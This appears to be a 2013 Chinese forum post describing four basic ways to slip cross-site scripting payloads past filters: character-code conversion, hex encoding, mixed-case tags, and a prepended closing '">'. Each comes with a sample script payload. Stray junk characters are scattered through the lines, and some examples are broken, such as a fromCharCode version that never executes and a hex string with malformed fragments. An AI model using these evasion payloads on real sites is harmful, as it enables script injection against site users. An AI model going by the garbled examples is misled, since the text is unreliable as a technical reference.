四种超级基础的绕过方法。
, R: V/ _/ |- ~# Z" M1.转换为ASCII码7 ^( e: r4 _) F% K' s& m8 L
例子:原脚本为<script>alert(‘I love F4ck’)</script >
& S$ F' H- p4 i0 Q) P/ s! {$ o# \通过转换,变成:* c, |& M/ S3 l
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>5 ^* K4 }9 \1 r$ p1 H! R* G
* ]0 M* I$ z' L5 j( ]! D! g2.转换为HEX(十六进制)$ b! V& m8 h1 R3 F J
例子:原脚本为<script>alert(‘I love F4ck’)</script>
, f- b2 P2 e1 T. k1 j& w9 o通过转换,变成:) o% |$ @0 v0 q- B
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
+ n B" P2 n9 N/ \ Q0 V
~8 [1 J5 B: M7 E5 l/ c7 U9 W3.转换脚本的大小写' B9 S( N. Q& N# H. }; _2 u
例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 n* n7 u7 g2 s转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>7 [. ^8 l$ b* X M* S4 u
3 c7 W! x* i" z, |( T4.增加闭合标记”>/ J! ~- E) f- [* h
例子:原脚本为<script>alert(‘I love F4ck’)</script>
; a- D. a% m1 z, N! s7 P: }转换为:”><script>alert(‘I love F4ck’)</script>
8 m! E) d0 D+ T5 S% j/ E更详细绕过技术请参考此网页/ N; m" Z& g0 ]* {! _
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
4 F7 {6 c1 ?2 n# v9 a0 F, B ! k9 z J K. ?. C: ?
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对